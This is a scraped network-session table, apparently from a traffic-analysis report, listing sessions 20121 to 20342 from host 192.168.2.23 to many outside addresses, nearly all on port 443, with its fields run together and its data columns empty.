                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20121192.168.2.2336282212.217.243.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20122192.168.2.235831017.76.194.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20123192.168.2.233940427.60.25.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20124192.168.2.2336952197.89.76.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20125192.168.2.2354592157.49.227.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20126192.168.2.2338184120.113.67.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20127192.168.2.2333942168.64.21.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20128192.168.2.234611863.197.154.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20129192.168.2.235574853.135.9.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20130192.168.2.2334158138.239.120.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20131192.168.2.235942823.132.237.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20132192.168.2.233897643.163.52.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20133192.168.2.2358864149.171.187.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20134192.168.2.2341330167.36.2.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20135192.168.2.235609686.170.251.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20136192.168.2.23604048.46.224.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20137192.168.2.2334730108.42.1.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20138192.168.2.2334118126.230.85.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20139192.168.2.234875020.111.178.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20140192.168.2.234100631.53.240.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20141192.168.2.23583669.235.45.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20142192.168.2.235907032.129.219.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20143192.168.2.235229842.148.41.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20144192.168.2.2360156176.96.130.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20145192.168.2.2358234158.67.121.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20146192.168.2.235723277.177.95.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20147192.168.2.2343688203.130.198.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20148192.168.2.2350412125.76.34.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20149192.168.2.234802018.231.19.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20150192.168.2.233296224.255.59.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20151192.168.2.2347352182.253.59.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20152192.168.2.2346196217.13.149.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20153192.168.2.235788431.159.97.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20154192.168.2.2349016122.216.206.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20155192.168.2.235444292.22.169.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20156192.168.2.235724045.94.59.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20157192.168.2.2349666147.116.124.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20158192.168.2.234020093.209.45.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20159192.168.2.2353880123.184.199.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20160192.168.2.235787247.40.109.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20161192.168.2.234332880.29.55.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20162192.168.2.234636250.8.166.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20163192.168.2.235824674.229.63.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20164192.168.2.2345028157.176.252.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20165192.168.2.23582645.50.210.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20166192.168.2.2350850136.67.168.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20167192.168.2.235115662.111.196.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20168192.168.2.2341944141.51.201.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20169192.168.2.234963052.120.100.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20170192.168.2.234289857.41.141.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20171192.168.2.2333334113.133.61.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20172192.168.2.2354682106.11.186.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20173192.168.2.233315865.28.10.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20174192.168.2.233806817.207.11.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20175192.168.2.2353944180.111.138.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20176192.168.2.235108238.80.211.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20177192.168.2.235561490.136.206.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20178192.168.2.2344780196.226.162.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20179192.168.2.234755498.77.139.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20180192.168.2.2340928133.237.145.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20181192.168.2.2353056175.132.178.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20182192.168.2.2354274173.37.107.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20183192.168.2.234966017.23.22.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20184192.168.2.2354672154.195.252.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20185192.168.2.2355772147.73.233.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20186192.168.2.2349786141.39.26.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20187192.168.2.234679072.190.209.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20188192.168.2.2337688206.31.160.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20189192.168.2.2357800136.114.91.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20190192.168.2.233699869.160.44.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20191192.168.2.234666638.125.208.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20192192.168.2.2351810128.164.25.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20193192.168.2.2347522179.252.254.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20194192.168.2.2347888185.191.207.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20195192.168.2.2339646203.151.177.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20196192.168.2.2341624217.164.26.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20197192.168.2.2339946217.77.129.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20198192.168.2.234779632.251.123.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20199192.168.2.235314225.53.195.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20200192.168.2.233795437.226.27.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20201192.168.2.2335354198.67.112.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20202192.168.2.233624265.215.35.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20203192.168.2.234810840.70.244.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20204192.168.2.2349892181.157.245.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20205192.168.2.234472497.33.143.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20206192.168.2.235570648.105.255.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20207192.168.2.2349492167.130.75.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20208192.168.2.235844486.234.159.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20209192.168.2.2355908179.228.161.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20210192.168.2.2359118157.67.156.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20211192.168.2.235498657.90.208.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20212192.168.2.235075023.108.247.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20213192.168.2.234270071.38.173.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20214192.168.2.233441873.116.54.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20215192.168.2.2357330201.132.173.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20216192.168.2.2337612103.37.86.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20217192.168.2.234821424.73.44.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20218192.168.2.2346458153.128.14.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20219192.168.2.233683498.27.113.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20220192.168.2.2333092191.185.214.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20221192.168.2.235449092.245.156.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20222192.168.2.233490487.202.150.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20223192.168.2.2341268210.58.225.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20224192.168.2.23588729.9.197.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20225192.168.2.2344686113.117.95.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20226192.168.2.235784020.11.143.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20227192.168.2.2333106152.51.111.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20228192.168.2.233299445.137.200.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20229192.168.2.2338500191.51.55.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20230192.168.2.2352504135.160.104.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20231192.168.2.2344946147.22.163.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20232192.168.2.2348122137.212.81.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20233192.168.2.2350338126.158.101.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20234192.168.2.2349838198.163.2.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20235192.168.2.2355554197.73.18.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20236192.168.2.235125418.213.214.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20237192.168.2.2358108201.81.193.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20238192.168.2.2352798149.114.243.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20239192.168.2.2360512108.154.47.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20240192.168.2.2355738143.241.165.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20241192.168.2.2353112157.168.65.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20242192.168.2.2335002191.116.87.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20243192.168.2.2346438170.238.226.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20244192.168.2.2335156223.123.135.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20245192.168.2.235209860.152.146.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20246192.168.2.2334380213.36.197.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20247192.168.2.2347982136.59.233.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20248192.168.2.2333644198.68.103.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20249192.168.2.235873064.178.131.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20250192.168.2.2350420210.41.40.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20251192.168.2.2358598112.1.206.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20252192.168.2.2353698186.10.110.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20253192.168.2.233311663.51.7.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20254192.168.2.233356093.247.50.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20255192.168.2.2338044202.17.175.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20256192.168.2.2360540102.87.202.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20257192.168.2.233615813.131.163.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20258192.168.2.2347910180.86.248.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20259192.168.2.234300495.42.128.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20260192.168.2.233971444.162.161.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20261192.168.2.2352634146.15.1.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20262192.168.2.2350412117.106.230.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20263192.168.2.234003038.205.242.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20264192.168.2.2357784202.122.34.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20265192.168.2.233726879.82.112.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20266192.168.2.235308425.63.246.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20267192.168.2.235743673.208.108.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20268192.168.2.234188858.91.157.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20269192.168.2.2360178200.242.93.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20270192.168.2.2354576138.242.199.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20271192.168.2.234627852.42.239.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20272192.168.2.2342526206.60.192.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20273192.168.2.2341254170.94.17.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20274192.168.2.2357286157.176.22.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20275192.168.2.234133450.106.3.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20276192.168.2.234282249.190.232.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20277192.168.2.2346530213.166.225.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20278192.168.2.2341040134.55.54.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20279192.168.2.2360102159.93.170.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20280192.168.2.2349154134.198.179.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20281192.168.2.2352614156.225.101.118080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20282192.168.2.233573267.72.242.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20283192.168.2.233693480.182.41.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20284192.168.2.2352040117.202.9.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20285192.168.2.2345456114.105.45.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20286192.168.2.234112485.118.174.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20287192.168.2.235704249.166.252.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20288192.168.2.2357094207.232.242.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20289192.168.2.2338112108.36.226.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20290192.168.2.2342968161.59.220.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20291192.168.2.233961663.26.115.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20292192.168.2.2346214122.27.208.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20293192.168.2.233512474.128.120.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20294192.168.2.234783064.108.25.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20295192.168.2.234001078.48.50.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20296192.168.2.2360574166.29.182.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20297192.168.2.23566128.28.126.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20298192.168.2.2352398129.63.106.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20299192.168.2.2354662121.238.25.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20300192.168.2.2333220221.173.202.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20301192.168.2.234764639.5.24.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20302192.168.2.233565697.68.250.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20303192.168.2.2356686117.4.158.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20304192.168.2.2333322187.22.91.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20305192.168.2.2357342200.7.172.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20306192.168.2.2344534191.121.141.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20307192.168.2.235218094.230.36.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20308192.168.2.2360632126.25.45.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20309192.168.2.2341630219.97.183.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20310192.168.2.2337980206.106.242.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20311192.168.2.2355126167.146.205.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20312192.168.2.2354454174.140.167.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20313192.168.2.2356540143.132.230.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20314192.168.2.2338650113.177.148.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20315192.168.2.233944438.158.140.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20316192.168.2.234786095.65.114.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20317192.168.2.2345258221.144.241.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20318192.168.2.2359342199.42.209.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20319192.168.2.236028453.159.84.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20320192.168.2.234277218.65.40.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20321192.168.2.234420458.215.199.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20322192.168.2.2341296119.187.209.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20323192.168.2.2342260209.32.90.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20324192.168.2.2354448148.223.171.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20325192.168.2.235546465.71.28.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20326192.168.2.235047617.188.110.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20327192.168.2.23563264.31.198.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20328192.168.2.234329844.154.71.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20329192.168.2.2336236124.208.176.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20330192.168.2.2338738208.45.89.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20331192.168.2.2357258139.18.199.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20332192.168.2.2341264121.179.32.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20333192.168.2.2340026125.47.170.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20334192.168.2.235825696.47.241.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20335192.168.2.2359044139.18.38.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20336192.168.2.236023468.3.23.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20337192.168.2.2336808202.225.30.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20338192.168.2.235475814.232.180.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20339192.168.2.235504881.51.168.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20340192.168.2.235218618.11.105.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20341192.168.2.233786888.234.123.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20342192.168.2.2337098162.91.228.191443
